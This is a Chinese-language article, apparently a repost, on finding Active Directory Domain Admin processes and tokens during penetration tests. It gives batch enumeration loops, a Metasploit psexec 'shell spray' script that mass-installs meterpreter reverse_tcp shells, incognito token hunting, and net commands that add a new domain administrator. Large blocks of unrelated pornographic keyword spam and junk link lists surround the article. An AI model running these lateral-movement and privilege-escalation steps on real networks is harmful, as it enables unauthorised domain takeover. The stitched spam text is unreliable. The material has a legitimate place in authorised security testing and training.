精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

五種尋找 "Domain Admin" 運行的進程的方法

新聞
當計算機加入到域后,默認將"Domain Admin"組賦予了本地系統管理員的權限。也就是說,在計算機添加到域,成為域的成員主機的過程中,系統將會自動把"Domain Admin"域組添加到本地的Administrators組中。因此,只要是Domain Admin組的成員均可訪問本地計算機,而且具備"完全控制"的權限。

前言

當計算機加入到域后,默認將"Domain Admin"組賦予了本地系統管理員的權限。也就是說,在計算機添加到域,成為域的成員主機的過程中,系統將會自動把"Domain Admin"域組添加到本地的Administrators組中。因此,只要是Domain Admin組的成員均可訪問本地計算機,而且具備"完全控制"的權限。

[[231721]]

因此對于滲透測試人員來說,把"Domain Admin"域組添加到本地的Administrators組中是他們模擬域管理員帳戶操作的常用方式。不過前提是,他們需要知道這些進程正在運行的系統。在本文中,五種尋找 "Domain Admin" 運行的進程的方法,其中涉及的技術包括:

1.本地檢查;

2.查詢活動域用戶會話的域控制器;

3.掃描運行任務的遠程系統;

4.掃描NETBIOS協議信息的遠程系統

5.用于令牌驗證的PSExec Shell噴灑遠程系統

獲取域管理權限

本文在大多數情況下,都將重點關注運行域管理進程的系統。不過即便如此,我還是要介紹一下很多滲透測試人員用來獲取域管理員權限的標準過程。

1.識別目標系統和應用程序;

2.識別潛在的漏洞;

3.利用漏洞獲取初始訪問權限;

4.升級受感染系統的權限;

5.在本地或遠程系統上找到域管理進程或身份驗證令牌;

6.通過發送本地管理員的密碼哈希,破解密碼或使用mimikatz這樣的工具來轉儲密碼,來對運行域管理進程的遠程系統進行身份驗證;

7.進入到域管理過程;

8.創建一個域管理;

以上過程是滲透測試的通用步驟,所以沒有必要值得多介紹。如果你對細節感興趣,網上都有大量的教材。

查找域管理進程

以下就是我在網絡上查到的查找域管理進程的5種技術。

技術1:本地檢查

請務必首先檢查最初被破壞的系統,如果你已經存在于域管理進程中,那么在網絡上運行真的沒什么意義了。以下是使用本機命令檢查是否有任何域管理進程正在運行的簡單方法:

1.運行以下命令以獲取域管理員列表:net group “Domain Admins” /domain;

2.運行Tasklist /v命令以列出進程和進程用戶,運行該過程的帳戶應該在第7列;

3.將任務列表與域管理員列表交叉引用,查看你是否進入域管理進程中;

如果域管理進程始終是在最初受到攻擊的系統上運行,那就太好了,但這屬于理想的情況。所以接下來的四種技術將幫助你在各種情況下的遠程域系統上找到域管理進程。

技巧2:查詢域控制器的活動域用戶會話

據我所知,這項技術是安全公司Netspi的原創技術。我們需要一種用來識別活動的域管理進程和登錄,而不是在整個網絡上執行shell噴灑或執行任何會引發“入侵檢測系統”的掃描。最終,我發現只需簡單地查詢以獲取一個活動域用戶會話列表即可,然后將該列表與域管理列表交叉引用。唯一可能出現問題的環節,就是你必須查詢所有的域控制器。下面是我提供的一些基本步驟,以獲得具有域用戶權限的活動域管理會話的系統列表。

1.使用LDAP查詢或net命令從“域控制器”OU中收集域控制器的列表,以下是我用過的一個net命令:

  1. net group “Domain Controllers” /domain 

請注意:雖然OU是域控制器列表的最佳來源,但前提是,你要對受信任域完成枚舉并監控這些域控制器的過程。或者,你可以通過DNS查找它們:Nslookup –type=SRV _ldap._tcp.

2.使用LDAP查詢或net命令從“域管理員”組中收集域管理員的列表。以下是我用過的一個net命令:

  1. net group “Domain Admins” /domain 

3.通過使用Netsess.exe查詢每個域控制器,收集所有活動域會話的列表。 Netsess工具是Joe Richards提供的一個很棒的工具,它里面包含了本地Windows函數“netsessionenum”。該函數可以返回活動會話的IP地址、域帳戶、會話啟動時間和空閑時間。以下是我用過的一個net命令:

  1. Netsess.exe –h 

4.將Domain Admin列表與活動會話列表交叉引用,以確定哪些IP地址上有活動的域令牌。在更安全的環境中,你可能需要等待具有域管理員權限的域管理員或服務帳戶在網絡上執行此操作。不過這意味著我需要多次運行這個過程,或者把它編寫出來。下面是一個使用了netsess的非??焖俸途哂泄袅Φ腤indows命令行腳本。

  1. FOR /F %i in (dcs.txt) do @echo [+] Querying DC %i && @netsess -h %i 2>nul > sessions.txt &&  
  2. FOR /F %a in (admins.txt) DO @type sessions.txt | @findstr /I %a 

不過請注意,dcs.txt有一個域控制器列表,admins.txt有一個Domain Admins列表。

為此,我編寫了一個名為Get Domain Admins(GDA)的基本批處理腳本,它可以自動下載整個過程。readme文件中列出了其中的依賴關系,我還為Windows Dictionary攻擊創建了一個名為Get Domain Users(GDU)的批處理文件,它具有和Get Domain Admins(GDA)相似的選項,不過具有更多的依賴關系。如果你感興趣,可點擊上面的鏈接下載。

技術3:掃描用于運行任務的遠程系統

通常情況下,前兩種方法已足以保證我取得成功。然而,山外有山,這第三種技術,就是我在LaNMSteR53的博客上看到的,我認為這是一個聰明的方法。當你在域系統上作為共享的本地管理員帳戶運行時,就可以通過以下的腳本來掃描系統域管理任務。與以上的技術類似,你需要首先枚舉Domain Admins。在下面的腳本中,ips.txt包含目標系統的列表,而names.txt包含域管理員的列表。

  1. FOR /F %i in (ips.txt) DO @echo [+] %i && @tasklist /V /S %i /U user /P password 2>NUL > output.txt && 
  2. FOR /F %n in (names.txt) DO @type output.txt | findstr %n > NUL && echo [!] %n was found running a process on %i && pause 

技術4:掃描NetBIOS信息的遠程系統

某些Windows系統仍然允許用戶通過NetBIOS查詢查詢登錄用戶,你可以使用本機nbtstat工具查詢信息,在nbtstat結果中,用戶名由“<03>”表示。

1.下面是另一個快速而具有攻擊的Windows命令行腳本,它將掃描遠程系統,找到活動的Domain Admins會話。注意:該腳本可以作為非域用戶運行。

  1. for /F %i in (ips.txt) do @echo [+] Checking %i && nbtstat -A %i 2>NUL >nbsessions.txt && FOR /F %n in (admins.txt) DO @type nbsessions.txt | findstr /I %n > NUL && echo [!] %n was found logged into %i 

2.你也可以使用運行速度稍快的nbtscan工具,下面是另一個基本的腳本命令:

  1. for /F %i in (ips.txt) do @echo[+] Checking %i && nbtscan -f %i 2>NUL >nbsessions.txt && FOR /F %n in (admins.txt) DO @type nbsessions.txt | findstr /I %n > NUL && echo [!] %n was found logged into %i 

技術5:用于身份驗證令牌遠程系統的PSExec Shell噴灑技術

Psexec“Shell spray”是在Metasploit中的Psexec模塊的數百個系統上安裝Shell(通常是meterpreter),從而使用共享的本地管理憑證。許多測試人員使用此方法與其他Metasploit功能一起來識別域管理令牌。雖然這是我最不喜歡的技術,但由于pentest社區的很多人都在積極使用它,我覺得我需要把它包括進來。不過,在運行環境中同時啟動500個shell可能會導致客戶的系統運行出現問題。確切的說,擁有500個shell意味著你可以更快地獲取數據。下面是我見過很多人使用的步驟:

1.安裝Metasploit 3.5及其以上版本;

2.將下面的腳本復制到一個文本文件中,并保存到Metasploit目錄中作為psexec_spray.rc,它是我最初在Jabra的博客上發現的腳本。

  1. #Setup Multi Handler to accept multiple incoming connections use multi/handler setg PAYLOAD windows/meterpreter/reverse_tcp setg LHOST 0.0.0.0 setg LPORT 55555 set ExitOnSession false exploit -j -z 

#Setup憑證使用windows/smb/psexec設置SMBPass。

#Setup域作為本地主機,只有使用域憑據才能設置SMBDomain。在#Disable有效載荷處理程序的psexec模塊中(使用多處理程序)用set DisablePayloadHandler true #Run Ruby代碼掃描所需網絡范圍的使用的REX API屬性:

  1. range walker #note: could also accept ip addresses from a file by replacing rhosts =”192.168.74.0/24” with rhosts = File.readlines(“c:systems.txt”) require ‘rex/socket/range_walk 

3.更新smbuser和smbpass參數;

4.發出msfconsole –r psexec_spray.rc命令來運行該腳本。psexec_spray.rc腳本將嘗試使用所提供的憑證在每個系統的192.168.1.0/24網絡中隨意安裝meterpreter shell。

5.然后,你可以使用Metasploit模塊中的token_hunter來識別每個帶shell

系統上的域管理令牌。步驟如下:

5.1 創建一個包含Domain Admins列表的文件,如下所示:COMPANYjoe-admin COMPANYbill-admin COMPANYdavid-admin

5.2 在msfconsole msf> load token_hunter中加載token_hunter模塊;

5.3 運行令牌捕獲工具來列出包含域管理令牌的會話 msf> token_hunt_user -f /tmp/domain-admin.txt

6.或者,可以使用Sessions –s loggedin

命令從每個帶shell的系統中獲取當前登錄用戶的列表,并手動查找Domain Admins。

添加新的域管理員

如果你已經獲取了meterpreter會話,則可以使用隱身模式來模擬域管理員,或者添加新的域管理員。隱身模式可以嘗試通過遍歷系統中所有可用的授權令牌來隨意添加新的域管理員。下面是在meterpreter中執行該操作的基本命令。

1.使用load incongnito命令在你的活動meterpreter會話中加載隱身模式;

2.嘗試利用以下命令,在系統上添加具有身份驗證令牌的域管理員:

  1. add_user -h  
  2. add_group “”Domain Admins”” -h 

如果你有興趣使用其他選項創建新的域管理員,則可以使用以下說明:

1.在meterpreter控制臺中,輸入PS命令以查看進程;

2.在meterpreter控制臺中,通過migrate命令找到域管理會話并進行遷移;

3.在meterpreter控制臺中,輸入shell命令獲取OS shell;

4.輸入以下本機Windows命令來添加新的域管理員:

  1. net user /add /domain  
  2. net group “Domain Admins” /add /domain 

總結

正如本文所述,有很多選項可用于識別域管理進程和身份驗證令牌。我建議使用對系統影響較低的方法,相信隨著時間的推移,人們會想出更好的想法。

責任編輯:武曉燕 來源: 4hou
相關推薦

2023-10-11 09:00:00

2020-08-26 14:44:05

CDNIP子域名

2019-11-27 10:36:11

進程通信IPC

2023-06-26 20:33:47

開源代碼

2022-12-29 08:46:15

IT采購投資

2009-06-18 09:03:58

Unix關機

2022-12-07 11:24:51

首席信息官IT

2009-07-03 17:48:24

JSP頁面跳轉

2025-04-25 08:55:00

Pod運維

2020-11-16 15:51:54

Kubernetes

2023-11-21 15:23:15

JavaScript工具

2022-01-10 06:52:59

查詢MySQL字段

2011-05-18 13:37:26

LINQ

2021-08-13 11:21:16

KubernetesKubectlLinux

2022-07-14 08:47:02

IT供應商入庫

2021-10-20 14:38:27

物聯網災難恢復IOT

2011-04-21 10:08:34

2021-11-02 07:54:40

List分片Java

2022-11-23 13:46:02

云支出云計算

2015-09-10 09:30:54

Java多線程同步
點贊
收藏

51CTO技術棧公眾號

国产免费久久精品| 欧美精品亚洲| 四虎4hu永久免费入口| 久久黄色片网站| 丰满人妻av一区二区三区| 国产精品美女久久久久久不卡| 亚洲欧美日韩国产中文在线| 国产精品xxx视频| 国产中文字幕一区二区| 国产精品探花在线| 亚洲国产av一区| 久久黄色免费网站| 亚洲欧美在线人成swag| 久久免费的精品国产v∧| 欧美国产精品日韩| 蜜臀一区二区三区精品免费视频 | 精品捆绑美女sm三区| 奇米888一区二区三区| 韩国av免费观看| 亚洲一级大片| 日本一区二区成人在线| 国产成人精品亚洲精品| 久久久久国产精品区片区无码| 亚洲日本在线观看视频| 久久精品水蜜桃av综合天堂| 91精品国产91久久久久久| 成年人性生活视频| av免费在线观| 国产一区二区免费在线| 久久九九有精品国产23| www.夜夜爽| 麻豆网站视频在线观看| 国产主播一区二区三区| 欧美亚洲一区在线| 蜜臀久久99精品久久久久久| av免费在线一区| 亚洲va中文字幕| 精品一区久久久久久| 在线观看黄网站| 亚洲人成伊人成综合图片| 精品免费在线视频| 欧美日韩一区二区三区免费| 亚洲第一色网站| 99伊人成综合| 国产午夜精品一区理论片飘花 | 日韩亚洲电影在线| 国产精品一二三在线观看| 91短视频版在线观看www免费| 秋霞国产午夜精品免费视频| 少妇高潮 亚洲精品| 91网址在线观看精品| 影音先锋在线播放| 亚洲丝袜另类动漫二区| 中文字幕在线观看一区二区| 亚洲精品动漫100p| 成人网站免费观看入口| 日韩一级免费在线观看| 国产高清一级毛片在线不卡| 96sao精品免费视频观看| 色婷婷精品大在线视频| 俺去亚洲欧洲欧美日韩| 99视频在线视频| 黄色免费在线看| av成人动漫在线观看| 国产成人亚洲综合91精品| 啦啦啦免费高清视频在线观看| 精品久久影院| 欧美大片拔萝卜| av观看免费在线| 麻豆电影在线播放| 成人免费在线视频观看| 国产日韩一区二区| 欧美高清69hd| 影音先锋日韩资源| 伊人久久久久久久久久久久久| 一级片黄色免费| 美国十次综合久久| 色综合久久88色综合天天免费| 日韩精品xxxx| 国产美女在线观看| 一区二区久久久久| 日韩高清专区| 国产免费久久久| 亚洲激情另类| 精品国产美女在线| avove在线播放| 精品一区av| www国产精品视频| 久久久久久久久久久97| 日韩av专区| 亚洲国产精品999| 欧美日韩理论片| 91精品入口| 亚洲美女精品久久| 欧美夫妇交换xxx| 91精品一区| 精品国精品国产| 日韩一区二区a片免费观看| 久久香蕉国产| 亚洲人成电影网站色www| 久久久久久无码精品人妻一区二区| 亚洲一区电影| 国产亚洲一区二区在线| 欧美激情图片小说| 久久精品国产68国产精品亚洲| 麻豆国产va免费精品高清在线| av永久免费观看| 欧美日韩三级| 欧美成人免费大片| 婷婷国产成人精品视频| 免费看成人哺乳视频网站| 精品国产乱子伦一区| 永久免费黄色片| 免费看成人人体视频| 精品国产一二三区| 日本理论中文字幕| 亚洲国产免费看| 国产欧美精品一区二区| 中国老头性行为xxxx| 首页国产欧美日韩丝袜| 国产成人一区二区三区小说 | 久久裸体视频| 成人欧美一区二区三区视频| 国产精品无码AV| 国产呦萝稀缺另类资源| 蜜桃成人在线| 国产福利在线| 一区二区三区毛片| 黄色永久免费网站| 亚洲激情播播| 欧美极品少妇全裸体| 国产在线拍揄自揄拍无码视频| 欧美日韩亚洲一区三区| 国产欧美一区二区三区四区| 国产精品欧美亚洲| 久久蜜桃av一区精品变态类天堂 | 日韩视频中午一区| 欧美xxxx精品| 日韩欧美一区二区三区在线视频| 国内外成人免费激情在线视频网站| 国产精品日日夜夜| 黑人巨大精品欧美一区| 99精品在线直播| 好男人在线视频www| 国产精品久久二区二区| 熟妇人妻无乱码中文字幕真矢织江| 日本欧美韩国| 亚洲欧美日韩天堂| 黄色在线观看国产| 久久欧美一区二区| 久久精品免费一区二区| 91成人在线| 欧美一区二区三区视频在线观看| 久久久老熟女一区二区三区91| 亚洲色图国产| 欧美亚洲成人免费| 三级黄视频在线观看| 国产精品久久久一本精品| 99热一区二区三区| 激情黄产视频在线免费观看| 欧美在线高清视频| 国产成人av免费观看| 综合久久99| www.久久久| 国精产品一区一区三区mba下载| 欧美一级片在线| 久久精品视频国产| 波多野结衣中文一区| 亚洲欧美在线网| 成全电影大全在线观看| 亚洲精品一区二区三区蜜桃下载| 久久久综合久久久| 99久久综合色| 大香煮伊手机一区| 日韩在线观看| 成人有码在线播放| 国产视频福利在线| 欧美日韩久久久一区| 一级特黄a大片免费| 91精品精品| 国产精品久久久久久影视| 免费国产黄色片| 日韩毛片高清在线播放| 女人扒开腿免费视频app| 亚洲国产美女| 午夜精品电影在线观看| 国产精品一二三产区| 日韩精品免费看| 久久久久成人精品无码| 99麻豆久久久国产精品免费| 国产又大又黄又粗又爽| 精品在线手机视频| 国产综合香蕉五月婷在线| 黄网站在线观| 尤物99国产成人精品视频| 99久久精品国产成人一区二区| 偷拍日韩校园综合在线| 免费看三级黄色片| 亚洲欧美偷拍自拍| 久久久久久久有限公司| 91av久久| 精品久久久影院| 精品久久久久久久久久久久久久久久久久 | 亚洲四色影视在线观看| 99国产在线播放| 欧美性生交大片免网| 99久久免费看精品国产一区| 日韩黄色小视频| 欧美成ee人免费视频| avtt久久| 国产成人精品综合| 欧美日韩色网| 日韩精品专区在线影院观看| 久久国产视频一区| 91亚洲午夜精品久久久久久| 欧美日韩黄色一级片| 国产精品久久久久蜜臀| 成人黄色免费在线观看| 午夜影院在线播放| 亚洲精品资源在线| 亚洲 欧美 日韩 综合| 亚洲欧美国产毛片在线| 最新中文字幕av| www..com久久爱| 91免费视频污| 麻豆91在线看| 国产一二三四五| 国产精久久久| 欧美激情在线观看| 麻豆网站在线免费观看| 中文字幕9999| 国产乱人乱偷精品视频a人人澡| 色综合欧美在线视频区| 国产污视频在线看| 亚洲综合激情小说| 日韩欧美123区| 国产成人av一区二区三区在线| 国产va亚洲va在线va| 午夜精品影视国产一区在线麻豆| 人人做人人澡人人爽欧美| 国产日本在线视频| 亚洲精品久久久久国产| 成人午夜福利视频| 欧美一区二区三区四区高清| 国产精品一级二级| 欧美久久一区二区| 国产在线观看成人| 一区二区日韩电影| 欧美三级小视频| 一区二区免费在线| 精品无码人妻一区二区三| 一区二区三区四区av| 一级性生活大片| 久久精品久久久精品美女| 一本久道中文无码字幕av| 媚黑女一区二区| 中文字幕精品—区二区日日骚| 91综合久久爱com| 欧日韩在线观看| 都市激情亚洲一区| 欧美成人精品在线播放| 91亚洲天堂| 欧美精品久久久久| jizz一区二区三区| 欧美黑人又粗大| 极品在线视频| 国产激情久久久| 日本国产一区| 欧美亚洲激情视频| 成人爱爱网址| 成人a在线观看| 超碰成人在线观看| 蜜桃麻豆91| 久久美女视频| 成人国产在线看| 99精品网站| 嫩草影院中文字幕| 日韩理论电影| 国产精品久久久影院| 亚洲人妖在线| 亚洲欧美国产日韩综合| 国产呦萝稀缺另类资源| 波多野结衣视频播放| 国产亚洲女人久久久久毛片| 最新版天堂资源在线| 国产一区二区三区四区在线观看| 色综合久久久无码中文字幕波多| zzijzzij亚洲日本少妇熟睡| 亚洲精品色午夜无码专区日韩| 亚洲欧美在线视频观看| 亚欧视频在线观看| 欧美人与性动xxxx| 天天操天天干天天爽| 日韩免费高清视频| 天堂资源中文在线| 亚洲第一天堂无码专区| 国产区av在线| 欧美国产精品人人做人人爱| 香蕉视频亚洲一级| 18久久久久久| 四虎影视精品永久在线观看| 国产精品区一区二区三含羞草| 亚洲精品tv| 精品国产乱码久久久久| 97精品中文字幕| 亚洲 高清 成人 动漫| 国产综合色视频| 在哪里可以看毛片| xf在线a精品一区二区视频网站| 免费观看一区二区三区| 国产午夜亚洲精品午夜鲁丝片| 欧美精品xxxxx| 欧美丝袜丝nylons| 污污视频在线观看网站| 日韩av在线免费播放| www在线免费观看视频| 久久天堂电影网| 成人天堂yy6080亚洲高清| 日本亚洲欧美三级| 日韩久久一区二区三区| 99影视tv| 亚洲人成免费网站| 日本超碰在线观看| 91蝌蚪porny| 国产在线视频二区| 日韩午夜在线观看| 日本免费在线视频| 久久99视频精品| 牛牛电影国产一区二区| 国产有码在线一区二区视频| 欧美精品一区二区三区精品| av动漫在线看| 成人av在线影院| 久久免费公开视频| 欧美不卡激情三级在线观看| 黄网站在线播放| 91老司机在线| 久久精品色综合| 性欧美videosex高清少妇| 亚洲欧美大片| 天天干天天爽天天射| 国产亚洲一区二区三区四区| 国产精品21p| 亚洲免费av网址| 91精品产国品一二三产区| 精品国产一区二区三区四区精华| 精品成人国产| 91丨porny丨对白| 精品国产乱码久久久久久虫虫漫画 | 久久国产精品-国产精品| 在线观看的日韩av| 无码人妻精品一区二区三| 亚洲国产视频一区| 黄色裸体一级片| 在线观看免费一区| 99久久久国产精品无码免费| 精品国内亚洲在观看18黄| 95精品视频| 欧美高清中文字幕| 成人午夜免费av| 国产成人在线网址| 欧美精品自拍偷拍动漫精品| 免费网站免费进入在线| 91在线高清免费观看| 亚洲精品2区| 亚洲av午夜精品一区二区三区| 亚洲午夜影视影院在线观看| 五月婷婷六月色| 国产激情久久久久| 亚洲高清影视| 亚洲啪av永久无码精品放毛片| 欧美日韩免费区域视频在线观看| 亚洲欧美日韩综合在线| 国产精品96久久久久久又黄又硬| 久久亚洲国产| 国产高潮失禁喷水爽到抽搐| 欧美激情一区不卡| 国产裸体无遮挡| 97视频在线观看播放| 精品视频一二| 少妇高潮毛片色欲ava片| 国产久卡久卡久卡久卡视频精品| 国产熟女一区二区| 91精品国产日韩91久久久久久| heyzo高清中文字幕在线| 欧美日韩中文国产一区发布| 久草这里只有精品视频| a天堂中文字幕| 91精品国产品国语在线不卡| 97天天综合网| 亚洲国产精品久久久久久女王| 国产乱码一区二区三区| 日韩色图在线观看| 久久精品99无色码中文字幕 | 天堂av免费在线| 精品99一区二区| 97精品国产综合久久久动漫日韩| 大片在线观看网站免费收看| 日本一区二区三区高清不卡| 蜜桃91麻豆精品一二三区|